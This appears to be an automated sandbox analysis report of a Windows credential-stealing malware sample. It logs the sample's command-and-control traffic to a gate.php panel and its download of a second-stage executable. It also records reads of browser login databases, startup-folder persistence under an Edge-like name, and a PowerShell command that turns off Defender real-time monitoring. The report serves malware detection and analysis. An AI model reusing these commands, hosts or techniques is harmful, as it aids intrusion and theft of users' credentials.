__exception__ June 29, 2021, 1:50 p.m.	stacktrace: EbGetHandleOfExecutingProject+0x22b3 rtcPackDate-0xba9 msvbvm60+0xd0dcf @ 0x72a10dcf rtcDoEvents+0x131 __vbaError-0x626 msvbvm60+0xce228 @ 0x72a0e228 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc000008f exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1636844 registers.edi: 2671408 registers.eax: 1636844 registers.ebp: 1636924 registers.edx: 0 registers.ebx: 2671408 registers.esi: 2671408 registers.ecx: 2	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	POST method with no referer header				suspicious_request	POST http://diamond.serivice.com/panel/gate.php
suspicious_features	POST method with no referer header				suspicious_request	POST http://diamond.serivice.com/panel/gate.php?f27=7723E01305C6

Performs some HTTP requests (29 events)

request	GET http://diamond.serivice.com/panel/gate.php?ct=1
request	POST http://diamond.serivice.com/panel/gate.php
request	POST http://diamond.serivice.com/panel/gate.php?f27=7723E01305C6
request	GET http://diamond.serivice.com/panel/gate.php?pl=1
request	GET http://diamond.serivice.com/panel/gate.php?gpp=1
request	GET http://diamond.serivice.com/panel/gate.php?p=1
request	GET http://diamond.serivice.com/panel/gate.php?gpp=4
request	GET http://diamond.serivice.com/panel/gate.php?p=4
request	GET http://diamond.serivice.com/panel/gate.php?gpp=2
request	GET http://diamond.serivice.com/panel/gate.php?p=2
request	GET http://diamond.serivice.com/panel/gate.php?gpp=3
request	GET http://diamond.serivice.com/panel/gate.php?p=3
request	GET http://diamond.serivice.com/panel/gate.php?lp=1
request	GET http://diamond.serivice.com/panel/gate.php?pcn=18
request	GET http://diamond.serivice.com/panel/gate.php?gpb=18
request	GET http://diamond.serivice.com/panel/gate.php?gpp=18
request	GET http://diamond.serivice.com/panel/gate.php?pcn=14
request	GET http://diamond.serivice.com/panel/gate.php?gpb=14
request	GET http://diamond.serivice.com/panel/gate.php?gpp=14
request	GET http://diamond.serivice.com/panel/gate.php?pcn=22
request	GET http://diamond.serivice.com/panel/gate.php?gpb=22
request	GET http://diamond.serivice.com/panel/gate.php?gpp=22
request	GET http://diamond.serivice.com/panel/gate.php?pcn=12
request	GET http://diamond.serivice.com/panel/gate.php?gpb=12
request	GET http://diamond.serivice.com/panel/gate.php?lpc=12
request	GET http://diamond.serivice.com/panel/gate.php?gpp=12
request	GET http://diamond.serivice.com/panel/gate.php?prf=1
request	GET http://diamond.serivice.com/panel/files/1624810178_ConsoleApp14.exe
request	GET http://diamond.serivice.com/panel/gate.php?lpc=18

Sends data using the HTTP POST Method (2 events)

request	POST http://diamond.serivice.com/panel/gate.php
request	POST http://diamond.serivice.com/panel/gate.php?f27=7723E01305C6

Allocates read-write-execute memory (usually to unpack itself) (50 out of 417 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 540 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x725b2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 1310720 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72091000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72092000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02941000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05110000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05111000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05112000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05113000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05114000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05115000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05116000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05117000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05118000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05119000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0511a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0511b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0511c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0511d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0511e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0511f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05120000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05121000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05122000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 1756 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05123000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (6 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW June 29, 2021, 1:50 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 13727186944 root_path: C: total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceExW June 29, 2021, 1:51 p.m.	total_number_of_free_bytes: 13728395264 free_bytes_available: 13728395264 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceW June 29, 2021, 1:50 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 29, 2021, 1:50 p.m.	number_of_free_clusters: 8362495 sectors_per_cluster: 8362495 bytes_per_sector: 512 root_path: C: total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 29, 2021, 1:51 p.m.	number_of_free_clusters: 3351411 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW June 29, 2021, 1:51 p.m.	number_of_free_clusters: 1636692 sectors_per_cluster: 0 bytes_per_sector: 0 root_path: D:\ total_number_of_clusters: 1636932		0

Steals private information from local Internet browsers (40 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-wal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data
file	C:\Users\test22\AppData\Roaming\Opera\Opera\wand.dat
file	C:\Users\test22\AppData\Roaming\Opera\Opera7\profile\wand.dat
file	C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data

Creates executable files on the filesystem (2 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeCPS.lnk
file	C:\Users\test22\AppData\Roaming\EdgeCP\8958C14E0407.exe

Creates hidden or system file (2 events)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW June 29, 2021, 1:50 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\EdgeCP\ filepath: C:\Users\test22\AppData\Roaming\EdgeCP\	1	1	0
SetFileAttributesW June 29, 2021, 1:50 p.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe filepath: C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	1	1	0

Creates a shortcut to an executable file (4 events)

file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeCPS.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeCPS.lnk
file	C:\Users\test22\AppData\Roaming\EdgeCP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (10 events)

cmdline	"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
cmdline	"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
cmdline	"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
cmdline	"wmic" path win32_VideoController get caption /FORMAT:List
cmdline	"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
cmdline	"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
cmdline	"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
cmdline	"wmic" os get caption /FORMAT:List
cmdline	"powershell" Start-Sleep -s 15;Start-Process 'C:\Users\test22\AppData\Roaming\EdgeCP\8958C14E0407.exe'
cmdline	"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\test22\AppData\Local\Temp\microsoftedgecps.exe' -Force -Recurse

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\microsoftedgecps.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (9 events)

Time & API	Arguments	Status	Return
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000394 process_name: pw.exe process_identifier: 3064	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000394 process_name: taskhost.exe process_identifier: 1340	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000394 process_name: MicrosoftEdgeCPS.exe process_identifier: 540	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000394 process_name: WmiPrvSE.exe process_identifier: 2720	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000394 process_name: conhost.exe process_identifier: 1868	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000438 process_name: MicrosoftEdgeCPS.exe process_identifier: 1052	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000438 process_name: MicrosoftEdgeCPS.exe process_identifier: 2728	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000438 process_name: WMIC.exe process_identifier: 2064	1	1
Process32NextW June 29, 2021, 1:50 p.m.	snapshot_handle: 0x00000130 process_name: MicrosoftEdgeCPS.exe process_identifier: 2988	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory June 29, 2021, 1:50 p.m.	process_identifier: 2128 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 24576 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x01c60000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process microsoftedgecps.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv June 29, 2021, 1:50 p.m.	buffer: HTTP/1.1 200 OK Date: Tue, 29 Jun 2021 04:51:15 GMT Server: Apache/2.4.46 (Unix) OpenSSL/1.1.1i PHP/8.0.1 mod_perl/2.0.11 Perl/v5.32.0 Last-Modified: Sun, 27 Jun 2021 16:09:38 GMT ETag: "be800-5c5c1997df546" Accept-Ranges: bytes Content-Length: 780288 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡Ø`à,ºJ `@ @@¼IW`¨¶ H.text* , `.rsrc¨¶`¸.@@.reloc æ@BøIHø+Ä-,=Ìî0 -&( +&+ö0 s( t-&++ received: 1024 socket: 640	1	1024	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00006800', u'virtual_address': u'0x0002a000', u'entropy': 7.507146602053799, u'name': u'.rdata', u'virtual_size': u'0x0000675c'}

entropy

7.50714660205

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (9 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW June 29, 2021, 1:50 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:50 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:50 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 29, 2021, 1:51 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

